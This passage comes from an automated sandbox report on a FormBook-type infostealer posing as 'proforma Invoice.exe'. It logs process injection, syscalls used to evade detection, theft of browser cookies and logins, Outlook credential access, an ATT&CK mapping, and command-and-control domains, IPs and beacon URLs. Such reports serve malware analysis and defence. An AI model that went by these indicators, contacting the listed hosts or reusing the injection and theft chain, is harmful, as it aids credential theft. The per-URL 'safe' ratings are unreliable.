                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\proforma Invoice.exeMemory written: C:\Users\user\Desktop\proforma Invoice.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: NULL target: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeSection loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeThread register set: target process: 6160Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeThread APC queued: target process: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeProcess created: C:\Users\user\Desktop\proforma Invoice.exe "C:\Users\user\Desktop\proforma Invoice.exe"Jump to behavior
                Source: C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: kYuxUXtJmKaZ.exe, 00000005.00000000.2387485851.0000000001351000.00000002.00000001.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498402024.0000000001351000.00000002.00000001.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498388269.0000000001631000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: kYuxUXtJmKaZ.exe, 00000005.00000000.2387485851.0000000001351000.00000002.00000001.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498402024.0000000001351000.00000002.00000001.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498388269.0000000001631000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: kYuxUXtJmKaZ.exe, 00000005.00000000.2387485851.0000000001351000.00000002.00000001.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498402024.0000000001351000.00000002.00000001.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498388269.0000000001631000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: kYuxUXtJmKaZ.exe, 00000005.00000000.2387485851.0000000001351000.00000002.00000001.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498402024.0000000001351000.00000002.00000001.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498388269.0000000001631000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Users\user\Desktop\proforma Invoice.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\proforma Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.proforma Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2476745672.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4498872401.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.proforma Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2476745672.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4498872401.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550873 Sample: proforma Invoice.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 31 www.trifecta.center 2->31 33 www.thefokusdong43.click 2->33 35 18 other IPs or domains 2->35 45 Antivirus detection for URL or domain 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 51 4 other signatures 2->51 10 proforma Invoice.exe 3 2->10         started        signatures3 process4 file5 29 C:\Users\user\...\proforma Invoice.exe.log, ASCII 10->29 dropped 63 Injects a PE file into a foreign processes 10->63 14 proforma Invoice.exe 10->14         started        signatures6 process7 signatures8 65 Maps a DLL or memory area into another process 14->65 17 kYuxUXtJmKaZ.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 EhStorAuthn.exe 13 17->20         started        process11 signatures12 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 3 other signatures 20->59 23 kYuxUXtJmKaZ.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.jorbaq.top 67.223.117.142, 50005, 50006, 50007 VIMRO-AS15189US United States 23->37 39 nutrigenfit.online 195.110.124.133, 50017, 50018, 50019 REGISTER-ASIT Italy 23->39 41 7 other IPs or domains 23->41 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                proforma Invoice.exe53%ReversingLabsWin32.Trojan.SnakeKeylogger
                proforma Invoice.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.seikai.click/c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6+mgIULDdoE9y629/Yed0CV4AMnOIzXEmhgnpyaCJF/2Tl+LMvC2Uf6a/XdOYn+kCA+BMl9RbhA==&yx-=dF9dYX9pQR-xIhFp0%Avira URL Cloudsafe
                http://www.roopiedutech.online/7ozt/0%Avira URL Cloudsafe
                http://www.jorbaq.top/saaz/0%Avira URL Cloudsafe
                http://roopiedutech.online/7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMd0%Avira URL Cloudsafe
                http://www.nutrigenfit.online0%Avira URL Cloudsafe
                http://www.nutrigenfit.online/xtuc/0%Avira URL Cloudsafe
                http://www.suerteconysa.online/2k8c/?N6gPj2W=LN885FCenV0arV5pDJ6h3a+LwxHrBQx0V+LnHznGnxO866p5HdYgFA4Q1Lryskeb84lUzgc9oK+kYxVS/Lu8euZMIM/0QxNAF1muDsae+W878EIY9SjqXiybtD+r8qgxLw==&yx-=dF9dYX9pQR-xIhFp0%Avira URL Cloudsafe
                http://www.owinvip.net/o5fg/0%Avira URL Cloudsafe
                http://www.spencermarcu.movie/6jke/?N6gPj2W=rRJ/+EeoqQH1jv9h2PxYf0uEP5S/0RESCBDmMrxCZyLsd2TFJm1VUMTcv3pSTCQ1Dx8MnXqZSxSGPUkXGUSRGRBSA9xnN9k9eX0mqtLeTR1pd/EPiIm/QSAex0qPnPOTeQ==&yx-=dF9dYX9pQR-xIhFp100%Avira URL Cloudmalware
                http://www.owinvip.net/o5fg/?N6gPj2W=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJY99e60Kw3j0IgWhxS41JWxIsLFgO3NczRgQE1UQqfRS1SQ==&yx-=dF9dYX9pQR-xIhFp0%Avira URL Cloudsafe
                http://seikai.click/c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e60%Avira URL Cloudsafe
                http://www.spencermarcu.movie/6jke/100%Avira URL Cloudmalware
                http://www.seraph.best/qfwu/0%Avira URL Cloudsafe
                http://www.jorbaq.top/saaz/?N6gPj2W=E1XhlXFLcWuCDIBP8to2tuUVnSemexwJ48Ab55V5HKBvWu90vpvIEGRMt7lYWMU5NPNXOFUjE36KCHhW/fBhyMiphohAP4glwjROtQZlzRCPRSaJk41pBGj4Bhn1O6AIFQ==&yx-=dF9dYX9pQR-xIhFp0%Avira URL Cloudsafe
                http://www.nutrigenfit.online/xtuc/?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=nl7gM5aMdEMYbb3ptVYmv1b7ec2+/kw+vnGGIIbLXQ8RGikaSqRdhk/1NtXc33OFwO5l66LjcfQUL5smZ/PpUkgPTPCZ371zTnVFYiKZa83XWAN88d/vEa+bzXIHSkQ2pw==0%Avira URL Cloudsafe
                http://www.seikai.click/c52l/0%Avira URL Cloudsafe
                http://www.suerteconysa.online/2k8c/0%Avira URL Cloudsafe
                http://www.neg21.top/w6i7/0%Avira URL Cloudsafe
                http://www.thefokusdong43.click/9rsa/0%Avira URL Cloudsafe
                http://www.roopiedutech.online/7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMdappGAEB9CQAwJ1/7vpTPOyeunU+wS9pROO2BCMLDVBWEVc4ObTViQoI1sZt/u29nLO6JUpw==&yx-=dF9dYX9pQR-xIhFp0%Avira URL Cloudsafe
                http://www.seraph.best/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                thefokusdong43.click
                		172.96.191.232
                		truefalse
                  		unknown
                  trifecta.center
                  		3.33.130.190
                  		truefalse
                    		unknown
                    owinvip.net
                    		3.33.130.190
                    		truefalse
                      		unknown
                      www.seraph.best
                      		52.20.84.62
                      		truefalse
                        		unknown
                        spencermarcu.movie
                        		3.33.130.190
                        		truefalse
                          		unknown
                          www.meetebok.shop
                          		104.21.29.71
                          		truefalse
                            		unknown
                            www.seikai.click
                            		183.90.181.102
                            		truefalse
                              		unknown
                              roopiedutech.online
                              		103.191.208.137
                              		truefalse
                                		unknown
                                www.jorbaq.top
                                		67.223.117.142
                                		truefalse
                                  		unknown
                                  nutrigenfit.online
                                  		195.110.124.133
                                  		truefalse
                                    		unknown
                                    neg21.top
                                    		206.119.81.36
                                    		truefalse
                                      		unknown
                                      suerteconysa.online
                                      		84.32.84.32
                                      		truefalse
                                        		unknown
                                        www.spencermarcu.movie
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.neg21.top
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.trifecta.center
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.thefokusdong43.click
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.roopiedutech.online
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.suerteconysa.online
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.owinvip.net
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.nutrigenfit.online
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://www.seikai.click/c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6+mgIULDdoE9y629/Yed0CV4AMnOIzXEmhgnpyaCJF/2Tl+LMvC2Uf6a/XdOYn+kCA+BMl9RbhA==&yx-=dF9dYX9pQR-xIhFpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.suerteconysa.online/2k8c/?N6gPj2W=LN885FCenV0arV5pDJ6h3a+LwxHrBQx0V+LnHznGnxO866p5HdYgFA4Q1Lryskeb84lUzgc9oK+kYxVS/Lu8euZMIM/0QxNAF1muDsae+W878EIY9SjqXiybtD+r8qgxLw==&yx-=dF9dYX9pQR-xIhFpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.owinvip.net/o5fg/false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.owinvip.net/o5fg/?N6gPj2W=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJY99e60Kw3j0IgWhxS41JWxIsLFgO3NczRgQE1UQqfRS1SQ==&yx-=dF9dYX9pQR-xIhFpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.jorbaq.top/saaz/false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.roopiedutech.online/7ozt/false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.nutrigenfit.online/xtuc/false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.spencermarcu.movie/6jke/?N6gPj2W=rRJ/+EeoqQH1jv9h2PxYf0uEP5S/0RESCBDmMrxCZyLsd2TFJm1VUMTcv3pSTCQ1Dx8MnXqZSxSGPUkXGUSRGRBSA9xnN9k9eX0mqtLeTR1pd/EPiIm/QSAex0qPnPOTeQ==&yx-=dF9dYX9pQR-xIhFpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.spencermarcu.movie/6jke/false
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.seikai.click/c52l/false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.jorbaq.top/saaz/?N6gPj2W=E1XhlXFLcWuCDIBP8to2tuUVnSemexwJ48Ab55V5HKBvWu90vpvIEGRMt7lYWMU5NPNXOFUjE36KCHhW/fBhyMiphohAP4glwjROtQZlzRCPRSaJk41pBGj4Bhn1O6AIFQ==&yx-=dF9dYX9pQR-xIhFpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.nutrigenfit.online/xtuc/?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=nl7gM5aMdEMYbb3ptVYmv1b7ec2+/kw+vnGGIIbLXQ8RGikaSqRdhk/1NtXc33OFwO5l66LjcfQUL5smZ/PpUkgPTPCZ371zTnVFYiKZa83XWAN88d/vEa+bzXIHSkQ2pw==false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.thefokusdong43.click/9rsa/false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.seraph.best/qfwu/false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.roopiedutech.online/7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMdappGAEB9CQAwJ1/7vpTPOyeunU+wS9pROO2BCMLDVBWEVc4ObTViQoI1sZt/u29nLO6JUpw==&yx-=dF9dYX9pQR-xIhFpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.suerteconysa.online/2k8c/false
                                                        • Avira URL Cloud: safe
                                                        		unknown
